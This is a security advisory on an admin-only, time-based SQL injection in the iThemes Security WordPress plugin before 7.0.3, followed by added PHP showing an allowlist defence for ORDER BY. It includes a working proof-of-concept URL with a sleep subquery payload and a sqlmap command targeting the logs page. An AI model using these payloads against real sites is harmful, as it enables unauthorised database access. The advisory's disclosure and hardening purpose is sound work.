The iThemes Security (better-wp-security) plugin before 7.0.3 for WordPress allows SQL Injection (by attackers with Admin privileges) via the logs page.

Vulnerability description: iThemes Security appears to be vulnerable to time-based SQL injection. The orderby parameter is vulnerable because the backend variable $sort_by_column is not escaped or validated before it is concatenated into the ORDER BY clause.

Privileges required: Admin user.

Technical details:

File: better-wp-security/core/admin-pages/logs-list-table.php
Line 271: if ( isset( $_GET['orderby'], $_GET['order'] ) ) {
Line 272:     $sort_by_column = $_GET['orderby'];

File: better-wp-security/core/lib/log-util.php
Line 168: $query .= ' ORDER BY ' . implode( ', ', $sort_by_column );
The following GET request will cause the SQL query to execute and sleep for 10 seconds if opened as an authenticated admin:

http://localhost/wordpress/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2C(select*from(select(sleep(10)))a)&order=asc&paged=0

Using sqlmap:

sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie 'wordpress_b…; wordpress_logged_in_bbf…;' --string 'WordPress' --dbms=MySQL --technique T --level 5 --risk 3
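The two code excerpts above show the whole problem: a request parameter is copied into $sort_by_column and later concatenated into ORDER BY with no check that it names a real column. Because ORDER BY takes identifiers, not values, prepared statements cannot protect it; the standard defence is to resolve the request value against an allowlist of sortable columns and directions before anything is concatenated. The PHP below is an added illustration of that pattern written for this advisory, not code from iThemes Security, and it does not claim to be the fix shipped in 7.0.3 (the advisory does not say what that fix was). The column names in $allowed_columns and the request values are constructed assumptions.

```php
<?php
// Added illustrative example; not code from the iThemes Security plugin.
// Contrasts the unsafe shape described in the advisory with an allowlist
// approach for ORDER BY, where prepared statements cannot help because the
// user input is an identifier, not a bound value.

/**
 * Unsafe shape: whatever arrives in orderby is split on commas and
 * concatenated into the query unchanged.
 */
function vulnerable_order_by( array $request ) {
    $sort_by_column = isset( $request['orderby'] )
        ? explode( ',', (string) $request['orderby'] )
        : array( 'id' );
    return ' ORDER BY ' . implode( ', ', $sort_by_column );
}

/**
 * Hardened shape: only exact matches from $allowed_columns and only
 * ASC/DESC ever reach the SQL string; anything else falls back to defaults.
 *
 * $allowed_columns is a hypothetical list of sortable log columns; the
 * plugin's real column set is not given in the advisory.
 */
function safe_order_by( array $request, array $allowed_columns, $default_column = 'id' ) {
    $requested = isset( $request['orderby'] )
        ? explode( ',', (string) $request['orderby'] )
        : array();

    $columns = array();
    foreach ( $requested as $col ) {
        // Strict comparison against the allowlist: no escaping or
        // normalisation is attempted, so "(select ...)" is simply dropped.
        if ( in_array( $col, $allowed_columns, true ) ) {
            $columns[] = $col;
        }
    }
    if ( empty( $columns ) ) {
        $columns[] = $default_column;
    }

    // Direction is likewise mapped to one of two literals, never copied.
    $direction = 'ASC';
    if ( isset( $request['order'] ) && 'desc' === strtolower( (string) $request['order'] ) ) {
        $direction = 'DESC';
    }

    // Backtick-quote the identifiers; each one is already known-good.
    $quoted = array_map( function ( $c ) { return '`' . $c . '`'; }, $columns );
    return ' ORDER BY ' . implode( ', ', $quoted ) . ' ' . $direction;
}

// Constructed request values for demonstration (hypothetical column set).
$allowed_columns = array( 'id', 'timestamp', 'remote_ip', 'module', 'type' );
$hostile_request = array(
    'orderby' => 'remote_ip,(select 1)',
    'order'   => 'asc',
);

echo vulnerable_order_by( $hostile_request ), "\n";
// unsafe:  ORDER BY remote_ip, (select 1)   <- subquery reaches the database
echo safe_order_by( $hostile_request, $allowed_columns ), "\n";
// safe:    ORDER BY `remote_ip` ASC          <- unknown token discarded
```

The point of the allowlist is that the request value is never placed in the query at all; the query string is assembled only from constants the code itself owns, and the input merely selects which of them to use. The same pattern applies to any user-controlled identifier (table, column, sort direction, LIMIT keyword), and a defender reviewing a WordPress admin page can spot the risk by looking for $_GET or $_POST values that reach a string concatenated with SQL without passing through such a lookup.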